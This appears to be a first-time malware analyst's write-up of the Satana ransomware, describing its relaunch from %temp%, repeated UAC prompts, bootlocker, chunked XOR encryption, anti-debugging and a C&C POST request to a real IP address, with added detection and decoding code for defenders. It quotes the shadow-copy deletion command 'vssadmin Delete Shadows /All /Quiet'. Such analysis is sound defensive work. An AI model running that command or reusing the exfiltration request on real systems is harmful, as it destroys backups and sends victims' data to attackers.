Satana Malware Analysis

I haven’t done any malware analysis before and this would be my first post related to malware. I’m really interested but still have quite a lot of things to learn 🙂 so I thought of starting somewhere, and this is my analysis of the ransomware named “Satana”. Obviously I hope you know who Satan is 👿

Samples:

Behavior Analysis

As soon as you run it, the main executable is deleted and a new copy is created inside the %temp% folder.

The following is the disassembly corresponding to this event.


The application shows us a UAC prompt. No matter how many times we press No, the prompt keeps reappearing.
When we click Yes it starts writing the malicious bootlocker code to the beginning of the disk.
The contact data relevant to each client is stored in the registry.

This malware also stores the ransom message in the system's startup location.

This malware calls the OutputDebugString function to output debug information, which suggests it may still be under development. We can use DebugView to view the debug messages generated by the malware.

It also shows us the file encryption in progress.

This malware encrypts files with the following extensions:

.bak .doc .jpg .jpe .txt .tex .dbf .db .xls
.cry .xml .vsd .pdf .csv .bmp .tif .1cd .tax
.gif .gbr .png .mdb .mdf .sdf .dwg .dxf .dgn
.stl .gho .v2i .3ds .ma .ppt .acc .vpd .odt
.ods .rar .zip .7z .cpp .pas .asm

It also deletes the shadow copies of backups on the hard disk by running vssadmin.exe with the following parameters:

Delete Shadows /All /Quiet

This is what the files look like afterwards. All encrypted files are renamed to: __

These are all the email addresses found in this malware.


After encrypting we see this ransomware message.

Once you click OK the system restarts and you see the bootlocker screen.

Dynamic Analysis

The malware has several execution paths. First it checks its command-line parameters.

When no parameters are supplied, the malware copies itself into the %temp% directory and executes the dropped copy with a GUID and the original path as command-line arguments, deleting the original file from its location.


"C:\Users\user\AppData\Local\Temp\cmh.exe" {e29ac6c0-7037-11de-816d-806e6f6e6963} "C:\Users\user\Desktop\ee.exe"

Once the user runs this malware it tries to run as an administrator by making the user click Yes. Even if we click No, the UAC prompt is displayed again. The authors call this “Admin Flood”. First it checks for admin rights using setupapi.IsUserAdmin; if we already have admin rights the verb passed to ShellExecute is “open”, otherwise it is “runas”, to try to obtain admin privileges.
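As an added example (not code from the post), this is detection logic a defender could run over process-creation events to catch the two behaviours described above: the relaunch from %temp% with a GUID and the original path as arguments, and the vssadmin shadow-copy deletion. The event format, pids and benign entries are constructed for this example.

```python
import re

# Constructed process-creation events for this example (not captured from
# the sample); pid values and the benign entries are invented.
SAMPLE_EVENTS = [
    {"pid": 1204, "image": r"C:\Users\user\Desktop\ee.exe",
     "cmdline": r'"C:\Users\user\Desktop\ee.exe"'},
    # The relaunch from %temp% as shown in the post: GUID plus original path
    {"pid": 1388, "image": r"C:\Users\user\AppData\Local\Temp\cmh.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\cmh.exe" '
                r'{e29ac6c0-7037-11de-816d-806e6f6e6963} "C:\Users\user\Desktop\ee.exe"'},
    # Benign: an installer running from %temp% without GUID/path arguments
    {"pid": 1400, "image": r"C:\Users\user\AppData\Local\Temp\setup.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\setup.exe" /S'},
    # Benign: an admin merely listing shadow copies
    {"pid": 1480, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe List Shadows"},
    # Shadow-copy deletion with the exact parameters the post reports
    {"pid": 1500, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
]

TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.I)
GUID = re.compile(r"\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}", re.I)
QUOTED_PATH = re.compile(r'"[A-Za-z]:\\[^"]+\.exe"')


def classify(event):
    """Return a rule name for a suspicious event, or None if it looks benign."""
    image, cmdline = event["image"], event["cmdline"]
    if TEMP_EXE.search(image):
        # Drop-and-relaunch pattern: a %temp% binary started with a GUID and a
        # second quoted .exe path (the location it was originally copied from).
        quoted = QUOTED_PATH.findall(cmdline)
        if GUID.search(cmdline) and len(quoted) >= 2:
            return "temp_relaunch_with_guid_and_origin"
    if image.lower().endswith(r"\vssadmin.exe"):
        args = cmdline.lower()
        if "delete shadows" in args and "/all" in args and "/quiet" in args:
            return "vssadmin_delete_all_shadows"
    return None


def detect(events):
    """Run classify() over every event and return (pid, rule) for the hits."""
    return [(e["pid"], r) for e in events if (r := classify(e))]
```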

The GUID is mentioned in the ransomware note.

This is how this malware enumerates the disks.

Encryption

This malware divides each file into 32-byte chunks and encrypts each chunk separately. Before encrypting, it generates a random key using the Read Time-Stamp Counter (RDTSC) instruction.

After that the content of this buffer is converted to ASCII, one DWORD at a time.

In my case the Key generated is:

7347D5A47560AED72D6D7CE4DDFC3B84B252405B2B171F492C3506F36686B85

This key is generated only once in each run.


0040F128 A4 D5 47 73|D7 AE 60 75|E4 7C 6D 2D|84 3B FC DD
0040F138 05 24 25 0B|F4 71 B1 B2|6F 50 C3 92|85 6B 68 36|


7347D5A4 7560AED7 2D6D7CE4 DDFC3B84 B252405 B2B171F4 92C3506F 36686B85

Next, each chunk of the file is XORed in DWORD-sized units with the first 4 DWORDs of the random buffer. The result is then passed into a second cipher, Crypt2.
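As an added example (not code from the post or the malware), this reproduces the key formatting step from the memory dump above and the first XOR layer so the two can be checked against each other. Assumptions: the ASCII conversion prints each little-endian DWORD with an unpadded %X (which is why the fifth DWORD 0B252405 appears as B252405 in the key string), the 4 key DWORDs cycle across the 8 DWORDs of a 32-byte chunk, and inputs are a multiple of 4 bytes; Crypt2 is not reproduced.

```python
import struct

CHUNK = 32  # each file is processed in 32-byte chunks, as the post describes

# The 32-byte key buffer exactly as dumped at 0040F128 in the post (8 DWORDs,
# stored little-endian in memory).
KEY_BUFFER = bytes.fromhex(
    "A4D54773" "D7AE6075" "E47C6D2D" "843BFCDD"
    "0524250B" "F471B1B2" "6F50C392" "856B6836"
)


def key_to_ascii(buf: bytes, zero_pad: bool = False) -> str:
    """Render the key buffer as hex, one little-endian DWORD at a time.

    zero_pad=False (assumed %X) reproduces the 63-character key in the post;
    zero_pad=True (%08X) would give the 64-character zero-padded form."""
    dwords = struct.unpack("<8I", buf)
    fmt = "%08X" if zero_pad else "%X"
    return "".join(fmt % d for d in dwords)


def xor_layer(data: bytes, buf: bytes) -> bytes:
    """First encryption layer: 32-byte chunks XORed DWORD-wise with the first
    4 DWORDs of the key buffer. The key index restarts at every chunk because
    each chunk is encrypted separately (cycling within a chunk is assumed)."""
    if len(data) % 4:
        raise ValueError("input must be a multiple of 4 bytes (DWORD units)")
    key = struct.unpack("<4I", buf[:16])
    out = bytearray()
    for off in range(0, len(data), CHUNK):
        chunk = data[off:off + CHUNK]
        words = struct.unpack("<%dI" % (len(chunk) // 4), chunk)
        mixed = [w ^ key[i % 4] for i, w in enumerate(words)]
        out += struct.pack("<%dI" % len(mixed), *mixed)
    return bytes(out)


if __name__ == "__main__":
    print(key_to_ascii(KEY_BUFFER))
    sample = b"constructed plaintext for the XOR layer demo.".ljust(64, b"\0")
    assert xor_layer(xor_layer(sample, KEY_BUFFER), KEY_BUFFER) == sample
```

Because XOR is its own inverse, applying xor_layer twice returns the plaintext, which is why this layer alone would offer no protection without Crypt2 on top.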

Network Communication

This malware sends the following POST request to the C&C. Note that the key only leaves the machine via this request: if the victim or the C&C is offline while encryption is happening, the key is lost and the files cannot be recovered even if the ransom is paid.

/add.php HTTP/1.0
Host: 185.127.26.186
Content-type: application/x-www-form-urlencoded
Content-length: 115

id=7&code=100&sdata=6.1.7600 0 1 WIN-C9AMVRVHN0T user 0&name=payload.exe&md5=&dlen=7EA61278DFBAD65AE31E707FFE019711

Anti-Reversing Tricks

At the start you can see this malware calls ntdll.NtQueryInformationProcess (commonly used to detect an attached debugger) and changes its execution path if the result is a non-zero value.

Other Findings

  • This malware won’t run properly on Windows XP: since vssadmin.exe is not present there, it gives us an error.
  • When testing this on VMware we don’t see the bootlocker; it was only visible on VirtualBox.

For a more thorough analysis check out hasherezade’s post on this malware:

Satana ransomware – threat coming soon?
